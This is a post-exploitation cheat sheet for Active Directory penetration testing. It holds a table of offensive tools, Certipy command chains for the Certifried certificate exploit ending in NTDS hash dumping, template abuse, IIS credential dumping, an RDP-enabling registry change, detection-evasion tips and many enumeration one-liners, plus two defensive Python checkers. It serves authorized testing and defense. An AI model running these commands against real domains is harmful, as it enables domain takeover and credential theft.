# 7.1 Post Exploitation

## Tooling

| Name | Description | URL |
| --- | --- | --- |
| BloodyAD Framework | BloodyAD is an Active Directory Privilege Escalation Framework; it can be used manually via bloodyAD.py or automatically by combining pathgen.py and autobloody.py. | https://github.com/CravateRouge/bloodyAD |
| Certify | Active Directory certificate abuse. | https://github.com/GhostPack/Certify |
| Certipy | Tool for Active Directory Certificate Services enumeration and abuse. | https://github.com/ly4k/Certipy |
| Cortex XDR Config Extractor | Extracts Palo Alto Cortex XDR log files. | https://github.com/Laokoon-SecurITy/Cortex-XDR-Config-Extractor |
| dnsteal | A fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. | https://github.com/m57/dnsteal |
| GTFOBins | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. | https://gtfobins.github.io/ |
| Impacket | Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself. | https://github.com/SecureAuthCorp/impacket |
| JAWS | JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. | https://github.com/411Hall/JAWS |
| LAPSDumper | Dumping LAPS from Python. | https://github.com/n00py/LAPSDumper |
| LinEnum | Privilege escalation enumeration. | https://github.com/rebootuser/LinEnum |
| LOLBAS | The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. | https://lolbas-project.github.io/ |
| lsassy | Python tool to remotely extract credentials on a set of hosts. | https://github.com/Hackndo/lsassy |
| PEASS-ng | Privilege Escalation Awesome Scripts SUITE new generation. | https://github.com/carlospolop/PEASS-ng |
| powercat | Netcat: the PowerShell version. | https://github.com/besimorhino/powercat |
| Powermad | PowerShell MachineAccountQuota and DNS exploit tools. | https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1 |
| PowerSharpPack | Many useful offensive C# projects wrapped into PowerShell for easy usage. | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |
| PowerSploit | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. | https://github.com/PowerShellMafia/PowerSploit |
| PowerUp | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |
| PowerView | PowerView is a PowerShell tool to gain network situational awareness on Windows domains. | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |
| pth-toolkit | A modified version of the passing-the-hash tool collection (https://code.google.com/p/passing-the-hash/) designed to be portable and work straight out of the box even on the most 'bare bones' systems. | https://github.com/byt3bl33d3r/pth-toolkit |
| pwncat | Post-exploitation platform. | https://github.com/calebstewart/pwncat |
| PyWhisker | Python version of the C# tool for "Shadow Credentials" attacks. | https://github.com/ShutdownRepo/pywhisker |
| Rubeus | Rubeus is a C# toolset for raw Kerberos interaction and abuses. | https://github.com/GhostPack/Rubeus |
| scavenger | scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding the most frequently used files and folders as well as "interesting" files containing sensitive information. | https://github.com/SpiderLabs/scavenger |
| Seatbelt | Seatbelt is a C# project that performs a number of security-oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. | https://github.com/GhostPack/Seatbelt |
| SharpCollection | Nightly builds of common C# offensive tools, fresh from their respective master branches, built and released in a CDI fashion using Azure DevOps release pipelines. | https://github.com/Flangvik/SharpCollection |
| Sherlock | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | https://github.com/rasta-mouse/Sherlock |
| static-binaries | This repo contains a bunch of statically-linked binaries of various tools, along with the Dockerfiles / other build scripts that can be used to build them. | https://github.com/andrew-d/static-binaries |
| tickey | Tool to extract Kerberos tickets from Linux kernel keys. | https://github.com/TarlogicSecurity/tickey |
| Watson | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for privilege escalation vulnerabilities. | https://github.com/rasta-mouse/Watson |
| WESNG | WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. | https://github.com/bitsadmin/wesng |
| Whisker | Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account. | https://github.com/eladshamir/Whisker |
| WinPwn | Automation for internal Windows penetration tests / AD security. | https://github.com/S3cur3Th1sSh1t/WinPwn |

## Active Directory Certificate Services (ADCS)

### Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)

Oliver Lyak, Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)

As long as the Object SID is missing from the issued certificate, the exploit will work.

```
$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
$ certipy auth -pfx ./<CERTIFICATE>.pfx -dc-ip <RHOST>
$ crackmapexec smb <RHOST> -u <USERNAME> -H <NTLMHASH> --ntds
```

I recommend doing DCSync / ntds only from Domain Controllers and only for a specific user like krbtgt, so as not to raise any alarms. Even this would not be the stealthiest way.
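The fix for CVE-2022-26923 makes the CA embed the requester's SID in issued certificates as a dedicated extension, which is exactly what the "missing Object SID" condition above refers to. The following is an added example (not code from the original cheat sheet or from Certipy) that checks a DER-encoded certificate for that extension using only the standard library; the sample bytes at the bottom are constructed, and the placeholder extension value is an assumption standing in for the real OtherName structure.

```python
# Added example (not from the original cheat sheet or from Certipy): check whether a
# DER-encoded X.509 certificate carries the Microsoft SID extension
# (OID 1.3.6.1.4.1.311.25.2), which CAs patched for CVE-2022-26923 add to issued
# certificates. Without it the KDC can only map the certificate via UPN/DNS name.

SID_EXT_OID = bytes.fromhex("2b0601040182371902")  # OID value bytes (1.3 -> 0x2B, 311 -> 0x82 0x37)

def iter_tlv(data: bytes):
    """Yield (tag, value) for each DER TLV in data (short and long-form lengths)."""
    i = 0
    while i + 1 < len(data):
        tag, length = data[i], data[i + 1]
        i += 2
        if length & 0x80:  # long form: low 7 bits give the size of the length field
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        yield tag, data[i:i + length]
        i += length

def find_extension(der_bytes: bytes, oid: bytes):
    """Return the extnValue of the extension with this OID, or None if absent."""
    for tag, value in iter_tlv(der_bytes):
        if tag == 0x30:  # SEQUENCE: an Extension is { extnID OID, [critical], extnValue }
            children = list(iter_tlv(value))
            if children and children[0] == (0x06, oid):
                return children[-1][1]
        if tag & 0x20:  # constructed (SEQUENCE, SET, [n] EXPLICIT): descend into it
            found = find_extension(value, oid)
            if found is not None:
                return found
    return None

def has_sid_extension(der_bytes: bytes) -> bool:
    return find_extension(der_bytes, SID_EXT_OID) is not None

def der(tag: int, payload: bytes) -> bytes:
    """Minimal DER TLV encoder, used only to build the constructed samples below."""
    n = len(payload)
    length = bytes([n]) if n < 128 else bytes([0x82]) + n.to_bytes(2, "big")
    return bytes([tag]) + length + payload

# Constructed samples: a "[3] EXPLICIT Extensions" element, not a full certificate. The
# real SID extnValue is an ASN.1 OtherName; a placeholder suffices for a presence check.
BASIC_CONSTRAINTS = der(0x30, der(0x06, bytes.fromhex("551d13")) + der(0x04, der(0x30, b"")))
SID_EXT = der(0x30, der(0x06, SID_EXT_OID) + der(0x04, b"S-1-5-21-placeholder"))
WITH_SID = der(0xA3, der(0x30, BASIC_CONSTRAINTS + SID_EXT))
WITHOUT_SID = der(0xA3, der(0x30, BASIC_CONSTRAINTS))
```

To check a real certificate, pass the raw DER bytes to `has_sid_extension` (convert PEM first with `openssl x509 -in cert.pem -outform DER -out cert.der`); a certificate issued for a machine account that lacks the extension is one the KDC maps purely by name.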

### Tooling

#### Certify

https://github.com/GhostPack/Certify

```
PS C:\> Certify find
```

#### Certipy

https://github.com/ly4k/Certipy

https://github.com/ly4k/BloodHound/

##### Common Commands

```
$ certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>
```

##### Certificate Handling

**Account Creation**

```
$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
```

**Authentication**

```
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>
```

**LDAP-Shell**

```
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell
# add_user <USERNAME>
# add_user_to_group <USERNAME> <GROUP>
```

**Certificate Forging**

```
$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old
```

**Certificate Request**

Run the following command twice because of a current issue with Certipy.

```
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
```

**Revert Changes**

```
$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLATE> -dc-ip <RHOST> -configuration <TEMPLATE>.json
```

#### PowerShell

**Add local Administrator** (PowerView's `Add-DomainObjectAcl`)

```
PS C:\> Add-DomainObjectAcl -TargetSearchbase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<DOMAIN>" -TargetIdentity <TEMPLATE> -PrincipalIdentity localadmin -Rights All
```

#### Start BloodHound Fork

```
$ ./BloodHound --disable-gpu-sandbox
```

## AppLocker Enumeration

```
// CMD
C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

// PowerShell
PS C:\> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\> Get-AppLockerPolicy -Effective -Xml
PS C:\> Get-ChildItem -Path HKLM:\Software\Policies\Microsoft\Windows\SrpV2 -Recurse
PS C:\> Get-AppLockerPolicy -Domain -LDAP "LDAP://DC13.Contoso.com/CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=Contoso,DC=com"
```

## Computer Enumeration

Enumerate all domain computers

```
// CMD
C:\> net group "Domain Computers" /domain

// PowerShell
PS C:\> ([ADSISearcher]"ObjectClass=computer").FindAll()
```

Enumerate specific domain computers

```
// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=computer)(name=DC*))").FindAll()
PS C:\> ([ADSISearcher]"(&(objectClass=computer)(name=FIL01))").FindAll()
```

Enumerate all domain controllers

```
// CMD
C:\> nltest /dclist:corp.contoso.local
C:\> nslookup -type=all _ldap._tcp.dc._msdcs.corp.contoso.local
C:\> net group "domain controllers" /domain

// PowerShell (userAccountControl bit 8192 = SERVER_TRUST_ACCOUNT, i.e. a domain controller)
PS C:\> ([ADSISearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll()
```

Enumerate the domain controller which authenticated the current session

```
// CMD
C:\> echo %LOGONSERVER%
C:\> nltest /dsgetdc:corp.contoso.local
```

## DNS Record Enumeration

The RSAT DNS tools are required for this; they provide the `Get-DnsServerResourceRecord` cmdlet.

```
PS C:\> Get-WindowsCapability -Online | Where Name -Match "Rsat.*" | Format-Table -AutoSize
PS C:\> Add-WindowsCapability -Online -Name Rsat.Dns.Tools~~~~0.0.1.0
PS C:\> Get-DnsServerResourceRecord -RRType A -ZoneName <ZONE> -ComputerName <RHOST>
```

## Domain Enumeration

Enumerate the domain name

```
// CMD
C:\> echo %USERDNSDOMAIN%
C:\> systeminfo | findstr /B /C:"Domain"
C:\> wmic computersystem get domain

// PowerShell
PS C:\> Get-ADDomain
PS C:\> [System.Net.Dns]::GetHostByName(($env:computerName))
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
```

Enumerate domain and forest trusts

```
// CMD
C:\> nltest /trusted_domains
C:\> nltest /server:cdc001.corp.contoso.local /sc_query:contoso.local

// PowerShell
PS C:\> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
PS C:\> ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())
PS C:\> ([ADSISearcher]"(objectClass=trustedDomain)").FindAll()
PS C:\> ([ADSISearcher]"(objectClass=trustedDomain)").FindAll() | %{ $a=$_.Properties["trustattributes"]; $d=$_.Properties["trustdirection"]; $t=$_.Properties["trusttype"]; Write-Host $_.Properties["distinguishedname"] $a $d $t }
```

Get information about the password policy

```
// CMD
C:\> net accounts
C:\> net accounts /domain

// PowerShell
PS C:\> Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser
```

## Enable RDP

```
C:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

// Move the RDP listener to 443/TCP (takes effect once the Remote Desktop Services service restarts)
C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
```

## Enumerating Groups

Enumerate all domain groups

```
// CMD
C:\> net group /domain

// PowerShell
PS C:\> ([ADSISearcher]"ObjectClass=group").FindAll()
PS C:\> ([ADSISearcher]"ObjectClass=group").FindAll() | %{ $_.Properties["samaccountname"] }
```

## Finding Unquoted Service Paths

```
PS C:\> Get-CimInstance -Class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | Select PathName, DisplayName, Name
```
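The one-liner only lists candidate services; what makes an unquoted path a problem is that Windows tries each space-delimited prefix as an image name in turn, so the parent directories of those prefixes are what need a write-ACL check. The following added example (not code from the original cheat sheet) reproduces that lookup order for a `PathName` value and lists the directories to audit; the sample path values are constructed, and the "first prefix ending in .exe is the real image" rule is a heuristic assumption.

```python
# Added example (not from the original cheat sheet): given a service PathName as returned
# by the Win32_Service query above, list the executables Windows would try in turn when the
# path is unquoted and contains spaces, and the directories whose ACLs a defender should
# verify. Pure string logic, so it runs anywhere on exported service data.
import ntpath

def unquoted_path_candidates(pathname: str) -> list[str]:
    """Ordered image names CreateProcess would try for an unquoted service PathName.

    Returns [] for quoted paths and paths without spaces (no ambiguity). Heuristic: the
    first space-delimited prefix ending in ".exe" is the intended image; the rest of the
    string is treated as service arguments.
    """
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return []
    tokens = pathname.split(" ")
    candidates = []
    for n in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:n])
        is_image = prefix.lower().endswith(".exe")
        if not is_image and not ntpath.splitext(prefix)[1]:
            prefix += ".exe"  # no extension on the last component: Windows appends .exe
        candidates.append(prefix)
        if is_image:
            break
    return candidates if len(candidates) > 1 else []

def directories_to_audit(pathname: str) -> list[str]:
    """Parent directories of the decoy candidates (all candidates before the real image).

    Write access for standard users to any of them is the misconfiguration that makes an
    unquoted path exploitable, so these are the ACLs to check (e.g. with icacls).
    """
    dirs: list[str] = []
    for candidate in unquoted_path_candidates(pathname)[:-1]:
        parent = ntpath.dirname(candidate)
        if parent not in dirs:
            dirs.append(parent)
    return dirs

# Constructed sample values in the shape Win32_Service.PathName returns them
SAMPLE_UNQUOTED = r"C:\Program Files\Vendor App\bin\svc.exe -run"
SAMPLE_QUOTED = r'"C:\Program Files\Vendor App\bin\svc.exe" -run'
```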

## IIS Application Pool Credential Dumping

```
// /@t:* is shorthand for /text:*, which prints every attribute of each pool, including processModel.password
C:\Windows\System32\inetsrv> appcmd.exe list apppool /@t:*
```

## Kerberos Exploitation

Don't use the RC4 (NTLM) hash for Overpass-the-Hash. If AES keys (AES128, AES256) are in use, request your ticket with one of them instead (`Rubeus.exe asktgt ... /enctype:aes256`), because it is less detectable.

### Service Principal Name (SPN) scanning

Get registered services for Kerberos

```
PS C:\> setspn -Q */*
```

## User Enumeration

Enumerate a single user

```
// CMD
C:\> net user maurice.moss /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368)(samaccountname=maurice.moss))").FindAll().Properties
```

Enumerate all domain users

```
// CMD
C:\> net user /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368))").FindAll() | ft
```

Enumerate all users with specific properties

```
// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368))").FindAll() | %{ $_.Properties["samaccountname"] }
```

Enumerate all members of a specific domain group

```
// CMD
C:\> net group "Domain Admins" /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(ObjectClass=group)(samaccountname=Domain Admins))").FindOne()
PS C:\> ([ADSISearcher]"(distinguishedname=CN=TS ACCESS,CN=Users,DC=corp,DC=contoso,DC=local)").FindOne().Properties.member
```

Enumerate all groups with the string "ACCESS" in the name property

```
// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=group)(name=*ACCESS*))").FindAll()
```

Enumerate all users with a set Service Principal Name (SPN)

```
// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(servicePrincipalName=*)(samAccountType=805306368))").FindAll()
```
